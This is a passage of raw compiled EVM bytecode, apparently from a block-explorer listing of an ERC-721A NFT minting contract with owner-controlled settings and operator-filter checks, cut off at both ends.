095945050505050565b5f81519050614ef381613c76565b92915050565b5f60208284031215614f0e57614f0d613c43565b5b5f614f1b84828501614ee5565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f614f5b82613dfd565b9150614f6683613dfd565b925082614f7657614f75614f24565b5b828204905092915050565b5f614f8b82613dfd565b9150614f9683613dfd565b9250828203905081811115614fae57614fad61487e565b5b92915050565b5f614fbe82613dfd565b9150614fc983613dfd565b925082614fd957614fd8614f24565b5b82820690509291505056fea264697066735822122067ac697b3e6f88b271f76fbfc88a6cd68a29c44b18965dc119b817f703df21b864736f6c63430008140033

Deployed Bytecode

0x60806040526004361061022f575f3560e01c8063715018a61161012d578063c6682862116100aa578063db7b64a81161006e578063db7b64a8146107cf578063e8a3d485146107f7578063e985e9c514610821578063f2fde38b1461085d578063f43a22dc146108855761022f565b8063c6682862146106ef578063c87b56dd14610719578063cd7c032614610755578063d476de1b1461077f578063db4a0f61146107a75761022f565b80639fb17e34116100f15780639fb17e3414610631578063a035b1fe1461064d578063a22cb46514610677578063b80f55c91461069f578063b88d4fde146106c75761022f565b8063715018a6146105755780638a333b501461058b5780638da5cb5b146105b5578063938e3d7b146105df57806395d89b41146106075761022f565b80632aa80807116101bb57806357ea89b61161017f57806357ea89b6146104935780635c975abb146104a95780636352211e146104d35780636c0360eb1461050f57806370a08231146105395761022f565b80632aa80807146103c957806342842e0e146103f1578063463fff79146104195780635312e5cf1461044357806355f804b31461046b5761022f565b8063095ea7b311610202578063095ea7b3146102fd57806318160ddd1461032557806318e223dd1461034f57806323b872dd1461037757806326e987d71461039f5761022f565b806301ffc9a71461023357806302329a291461026f57806306fdde0314610297578063081812fc146102c1575b5f80fd5b34801561023e575f80fd5b5061025960048036038101906102549190613ca0565b6108af565b6040516102669190613ce5565b60405180910390f35b34801561027a575f80fd5b5061029560048036038101906102909190613d28565b610990565b005b3480156102a2575f80fd5b506102ab610a86565b6040516102b89190613ddd565b60405180910390f35b3480156102cc575f80fd5b506102e760048036038101906102e29190613e30565b610b16565b6040516102f49190613e9a565b60405180910390f35b348015610308575f80fd5b50610323600480360381019061031e9190613edd565b610b8e565b005b348015610330575f80fd5b50610339610c97565b6040516103469190613f2a565b60405180910390f35b34801561035a575f80fd5b5061037560048036038101906103709190613e30565b610cac565b005b348015610382575f80fd5b5061039d60048036038101906103989190613f43565b610d90565b005b3480156103aa575f80fd5b506103b3610f6d565b6040516103c09190613f2a565b60405180910390f35b3480156103d4575f80fd5b506103ef60048036038101906103ea91906140bf565b610f73565b005b3480156103fc575f80fd5b5061041760048036038101906104129190613f43565b611060565b005b348015610424575f80fd5b5061042d61125b565b60405161043a9190613f2a565b60405180910390f35b34801561044e575f80fd5b5061046960048036038101906104649190613e30565b611261565b005b348015610476575f80fd5b50610491600480360381019061048c91906140bf565b611345565b005b34801561049e575f80fd5b506104a7611432565b005b3480156104b4575f80fd5b506104bd6115c3565b6040516104ca9190613ce5565b60405180910390f35b3480156104de575f80fd5b506104f960048036038101906104f49190613e30565b6115d5565b6040516105069190613e9a565b60405180910390f35b34801561051a575f80fd5b506105236115e9565b6040516105309190613ddd565b60405180910390f35b348015610544575f80fd5b5061055f600480360381019061055a9190614106565b611675565b60405161056c9190613f2a565b60405180910390f35b348015610580575f80fd5b5061058961173f565b005b348015610596575f80fd5b5061059f6117c6565b6040516105ac9190613f2a565b60405180910390f35b3480156105c0575f80fd5b506105c96117cc565b6040516105d69190613e9a565b60405180910390f35b3480156105ea575f80fd5b50610605600480360381019061060091906140bf565b6117f4565b005b348015610612575f80fd5b5061061b6118e1565b6040516106289190613ddd565b60405180910390f35b61064b60048036038101906106469190613e30565b611971565b005b348015610658575f80fd5b50610661611c12565b60405161066e9190613f2a565b60405180910390f35b348015610682575f80fd5b5061069d60048036038101906106989190614131565b611c18565b005b3480156106aa575f80fd5b506106c560048036038101906106c09190614233565b611d8a565b005b3480156106d2575f80fd5b506106ed60048036038101906106e89190614318565b611eb3565b005b3480156106fa575f80fd5b50610703612167565b6040516107109190613ddd565b60405180910390f35b348015610724575f80fd5b5061073f600480360381019061073a9190613e30565b6121f3565b60405161074c9190613ddd565b60405180910390f35b348015610760575f80fd5b5061076961229c565b6040516107769190613e9a565b60405180910390f35b34801561078a575f80fd5b506107a560048036038101906107a09190613e30565b6122b4565b005b3480156107b2575f80fd5b506107cd60048036038101906107c89190613e30565b612398565b005b3480156107da575f80fd5b506107f560048036038101906107f09190613e30565b61247c565b005b348015610802575f80fd5b5061080b61256a565b6040516108189190613ddd565b60405180910390f35b34801561082c575f80fd5b5061084760048036038101906108429190614398565b6125f6565b6040516108549190613ce5565b60405180910390f35b348015610868575f80fd5b50610883600480360381019061087e9190614106565b6126d7565b005b348015610890575f80fd5b506108996127cd565b6040516108a69190613f2a565b60405180910390f35b5f7f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061097957507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806109895750610988826127d2565b5b9050919050565b61099861283b565b73ffffffffffffffffffffffffffffffffffffffff166109b66117cc565b73ffffffffffffffffffffffffffffffffffffffff161480610a2b57506109db61283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6190614420565b60405180910390fd5b8060115f6101000a81548160ff02191690831515021790555050565b606060028054610a959061446b565b80601f0160208091040260200160405190810160405280929190818152602001828054610ac19061446b565b8015610b0c5780601f10610ae357610100808354040283529160200191610b0c565b820191905f5260205f20905b815481529060010190602001808311610aef57829003601f168201915b5050505050905090565b5f610b2082612842565b610b56576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60065f8381526020019081526020015f205f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b5f610b98826115d5565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c1e61283b565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c505750610c4e81610c4961283b565b6125f6565b155b15610c87576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610c9283838361288b565b505050565b5f610ca061293a565b6001545f540303905090565b610cb461283b565b73ffffffffffffffffffffffffffffffffffffffff16610cd26117cc565b73ffffffffffffffffffffffffffffffffffffffff161480610d475750610cf761283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7d90614420565b60405180910390fd5b80600f8190555050565b825f6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f5b573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e0157610dfc84848461293e565b610f67565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610e4a92919061449b565b602060405180830381865afa158015610e65573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610e8991906144d6565b8015610f1957506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610ed992919061449b565b602060405180830381865afa158015610ef4573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610f1891906144d6565b5b610f5a57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f519190613e9a565b60405180910390fd5b5b610f6684848461293e565b5b50505050565b600e5481565b610f7b61283b565b73ffffffffffffffffffffffffffffffffffffffff16610f996117cc565b73ffffffffffffffffffffffffffffffffffffffff16148061100e5750610fbe61283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61104d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104490614420565b60405180910390fd5b80600c908161105c919061469e565b5050565b825f6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561123a573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036110e0576110db84848460405180602001604052805f815250611eb3565b611255565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161112992919061449b565b602060405180830381865afa158015611144573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061116891906144d6565b80156111f857506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016111b892919061449b565b602060405180830381865afa1580156111d3573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111f791906144d6565b5b61123957336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112309190613e9a565b60405180910390fd5b5b61125484848460405180602001604052805f815250611eb3565b5b50505050565b600d5481565b61126961283b565b73ffffffffffffffffffffffffffffffffffffffff166112876117cc565b73ffffffffffffffffffffffffffffffffffffffff1614806112fc57506112ac61283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61133b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161133290614420565b60405180910390fd5b80600d8190555050565b61134d61283b565b73ffffffffffffffffffffffffffffffffffffffff1661136b6117cc565b73ffffffffffffffffffffffffffffffffffffffff1614806113e0575061139061283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61141f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161141690614420565b60405180910390fd5b80600a908161142e919061469e565b5050565b61143a61283b565b73ffffffffffffffffffffffffffffffffffffffff166114586117cc565b73ffffffffffffffffffffffffffffffffffffffff1614806114cd575061147d61283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61150c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150390614420565b60405180910390fd5b5f4790505f61151961283b565b73ffffffffffffffffffffffffffffffffffffffff168260405161153c9061479a565b5f6040518083038185875af1925050503d805f8114611576576040519150601f19603f3d011682016040523d82523d5f602084013e61157b565b606091505b50509050806115bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115b6906147f8565b60405180910390fd5b5050565b60115f9054906101000a900460ff1681565b5f6115df82612e07565b5f01519050919050565b600a80546115f69061446b565b80601f01602080910402602001604051908101604052809291908181526020018280546116229061446b565b801561166d5780601f106116445761010080835404028352916020019161166d565b820191905f5260205f20905b81548152906001019060200180831161165057829003601f168201915b505050505081565b5f8073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036116db576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60055f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f015f9054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b61174761283b565b73ffffffffffffffffffffffffffffffffffffffff166117656117cc565b73ffffffffffffffffffffffffffffffffffffffff16146117bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b290614420565b60405180910390fd5b6117c45f613083565b565b600f5481565b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6117fc61283b565b73ffffffffffffffffffffffffffffffffffffffff1661181a6117cc565b73ffffffffffffffffffffffffffffffffffffffff16148061188f575061183f61283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6118ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118c590614420565b60405180910390fd5b80600b90816118dd919061469e565b5050565b6060600380546118f09061446b565b80601f016020809104026020016040519081016040528092919081815260200182805461191c9061446b565b80156119675780601f1061193e57610100808354040283529160200191611967565b820191905f5260205f20905b81548152906001019060200180831161194a57829003601f168201915b5050505050905090565b5f61197a61283b565b905060115f9054906101000a900460ff16156119cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119c290614860565b60405180910390fd5b816119d4610c97565b6119de91906148ab565b600f541015611a22576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1990614928565b60405180910390fd5b5f8211611a64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a5b90614990565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1614611ad2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac9906149f8565b60405180910390fd5b8160051015611b16576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0d90614a60565b60405180910390fd5b611b1e610c97565b600e5410611b705781600d541015611b6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b6290614ac8565b60405180910390fd5b611c04565b8160051015611bb4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bab90614a60565b60405180910390fd5b3460105483611bc39190614ae6565b14611c03576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bfa90614b71565b60405180910390fd5b5b611c0e8183613146565b5050565b60105481565b611c2061283b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611c84576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060075f611c9061283b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611d3961283b565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611d7e9190613ce5565b60405180910390a35050565b611d9261283b565b73ffffffffffffffffffffffffffffffffffffffff16611db06117cc565b73ffffffffffffffffffffffffffffffffffffffff161480611e255750611dd561283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611e64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e5b90614420565b60405180910390fd5b5f815190505f5b81811015611eae575f838281518110611e8757611e86614b8f565b5b60200260200101519050611e9a81613163565b508080611ea690614bbc565b915050611e6b565b505050565b835f6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156120e9573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611f8f57611f1f85858561293e565b611f3e8473ffffffffffffffffffffffffffffffffffffffff166134d9565b8015611f535750611f51858585856134fb565b155b15611f8a576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b612160565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401611fd892919061449b565b602060405180830381865afa158015611ff3573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061201791906144d6565b80156120a757506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161206792919061449b565b602060405180830381865afa158015612082573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906120a691906144d6565b5b6120e857336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016120df9190613e9a565b60405180910390fd5b5b6120f485858561293e565b6121138473ffffffffffffffffffffffffffffffffffffffff166134d9565b80156121285750612126858585856134fb565b155b1561215f576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b5050505050565b600c80546121749061446b565b80601f01602080910402602001604051908101604052809291908181526020018280546121a09061446b565b80156121eb5780601f106121c2576101008083540402835291602001916121eb565b820191905f5260205f20905b8154815290600101906020018083116121ce57829003601f168201915b505050505081565b60606121fe82612842565b61223d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161223490614c4d565b60405180910390fd5b5f600a805461224b9061446b565b9050116122665760405180602001604052805f815250612295565b600a61227183613646565b600c60405160200161228593929190614d25565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b6122bc61283b565b73ffffffffffffffffffffffffffffffffffffffff166122da6117cc565b73ffffffffffffffffffffffffffffffffffffffff16148061234f57506122ff61283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61238e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161238590614420565b60405180910390fd5b80600e8190555050565b6123a061283b565b73ffffffffffffffffffffffffffffffffffffffff166123be6117cc565b73ffffffffffffffffffffffffffffffffffffffff16148061243357506123e361283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612472576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246990614420565b60405180910390fd5b8060108190555050565b61248461283b565b73ffffffffffffffffffffffffffffffffffffffff166124a26117cc565b73ffffffffffffffffffffffffffffffffffffffff16148061251757506124c761283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612556576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161254d90614420565b60405180910390fd5b61256761256161283b565b82613146565b50565b600b80546125779061446b565b80601f01602080910402602001604051908101604052809291908181526020018280546125a39061446b565b80156125ee5780601f106125c5576101008083540402835291602001916125ee565b820191905f5260205f20905b8154815290600101906020018083116125d157829003601f168201915b505050505081565b5f8073a5409ec958c83c3f309868babaca7c86dcb077c190508273ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1663c4552791866040518263ffffffff1660e01b815260040161265f9190613e9a565b602060405180830381865afa15801561267a573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061269e9190614d90565b73ffffffffffffffffffffffffffffffffffffffff16036126c35760019150506126d1565b6126cd848461379f565b9150505b92915050565b6126df61283b565b73ffffffffffffffffffffffffffffffffffffffff166126fd6117cc565b73ffffffffffffffffffffffffffffffffffffffff1614612753576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161274a90614420565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036127c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127b890614e2b565b60405180910390fd5b6127ca81613083565b50565b600581565b5f7f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b5f33905090565b5f8161284c61293a565b1115801561285a57505f5482105b8015612884575060045f8381526020019081526020015f205f01601c9054906101000a900460ff16155b9050919050565b8260065f8481526020019081526020015f205f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b5f90565b5f61294882612e07565b90505f815f015173ffffffffffffffffffffffffffffffffffffffff1661296d61283b565b73ffffffffffffffffffffffffffffffffffffffff16148061299f575061299e825f015161299961283b565b6125f6565b5b806129e457506129ad61283b565b73ffffffffffffffffffffffffffffffffffffffff166129cc84610b16565b73ffffffffffffffffffffffffffffffffffffffff16145b905080612a1d576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16825f015173ffffffffffffffffffffffffffffffffffffffff1614612a85576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603612aea576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b612af7858585600161382d565b612b055f84845f015161288b565b600160055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f015f8282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160055f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f015f8282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055508360045f8581526020019081526020015f205f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055504260045f8581526020019081526020015f205f0160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505f6001840190505f73ffffffffffffffffffffffffffffffffffffffff1660045f8381526020019081526020015f205f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603612d97575f54811015612d9657825f015160045f8381526020019081526020015f205f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550826020015160045f8381526020019081526020015f205f0160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4612e008585856001613833565b5050505050565b612e0f613bfa565b5f82905080612e1c61293a565b11158015612e2a57505f5481105b1561304c575f60045f8381526020019081526020015f206040518060600160405290815f82015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020015f820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff1681526020015f8201601c9054906101000a900460ff1615151515815250509050806040015161304a575f73ffffffffffffffffffffffffffffffffffffffff16815f015173ffffffffffffffffffffffffffffffffffffffff1614612f3657809250505061307e565b5b6001156130495781806001900392505060045f8381526020019081526020015f206040518060600160405290815f82015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020015f820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff1681526020015f8201601c9054906101000a900460ff16151515158152505090505f73ffffffffffffffffffffffffffffffffffffffff16815f015173ffffffffffffffffffffffffffffffffffffffff161461304457809250505061307e565b612f37565b5b505b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b61315f828260405180602001604052805f815250613839565b5050565b5f61316d82612e07565b905061317f815f01515f84600161382d565b61318d5f83835f015161288b565b600160055f835f015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f015f8282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160055f835f015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f0160108282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550805f015160045f8481526020019081526020015f205f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055504260045f8481526020019081526020015f205f0160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160045f8481526020019081526020015f205f01601c6101000a81548160ff0219169083151502179055505f6001830190505f73ffffffffffffffffffffffffffffffffffffffff1660045f8381526020019081526020015f205f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603613455575f5481101561345457815f015160045f8381526020019081526020015f205f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550816020015160045f8381526020019081526020015f205f0160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50815f73ffffffffffffffffffffffffffffffffffffffff16825f015173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46134c4815f01515f846001613833565b60015f81548092919060010191905055505050565b5f808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b5f8373ffffffffffffffffffffffffffffffffffffffff1663150b7a0261352061283b565b8786866040518563ffffffff1660e01b81526004016135429493929190614e9b565b6020604051808303815f875af192505050801561357d57506040513d601f19601f8201168201806040525081019061357a9190614ef9565b60015b6135f3573d805f81146135ab576040519150601f19603f3d011682016040523d82523d5f602084013e6135b0565b606091505b505f8151036135eb576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60605f820361368c576040518060400160405280600181526020017f3000000000000000000000000000000000000000000000000000000000000000815250905061379a565b5f8290505f5b5f82146136bb5780806136a490614bbc565b915050600a826136b49190614f51565b9150613692565b5f8167ffffffffffffffff8111156136d6576136d5613f9b565b5b6040519080825280601f01601f1916602001820160405280156137085781602001600182028036833780820191505090505b5090505b5f8514613793576001826137209190614f81565b9150600a8561372f9190614fb4565b603061373b91906148ab565b60f81b81838151811061375157613750614b8f565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff191690815f1a905350600a8561378c9190614f51565b945061370c565b8093505050505b919050565b5f60075f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16905092915050565b50505050565b50505050565b613846838383600161384b565b505050565b5f805490505f73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16036138b5576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5f84036138ee576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6138fa5f86838761382d565b8360055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f015f8282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055508360055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f0160088282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055508460045f8381526020019081526020015f205f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055504260045f8381526020019081526020015f205f0160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505f8190505f8582019050838015613ab45750613ab38773ffffffffffffffffffffffffffffffffffffffff166134d9565b5b15613b75575b818773ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4613b275f8884806001019550886134fb565b613b5d576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b808203613aba57825f5414613b70575f80fd5b613bdf565b5b818060010192508773ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4808203613b76575b815f819055505050613bf35f868387613833565b5050505050565b60405180606001604052805f73ffffffffffffffffffffffffffffffffffffffff1681526020015f67ffffffffffffffff1681526020015f151581525090565b5f604051905090565b5f80fd5b5f80fd5b5f7fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b613c7f81613c4b565b8114613c89575f80fd5b50565b5f81359050613c9a81613c76565b92915050565b5f60208284031215613cb557613cb4613c43565b5b5f613cc284828501613c8c565b91505092915050565b5f8115159050919050565b613cdf81613ccb565b82525050565b5f602082019050613cf85f830184613cd6565b92915050565b613d0781613ccb565b8114613d11575f80fd5b50565b5f81359050613d2281613cfe565b92915050565b5f60208284031215613d3d57613d3c613c43565b5b5f613d4a84828501613d14565b91505092915050565b5f81519050919050565b5f82825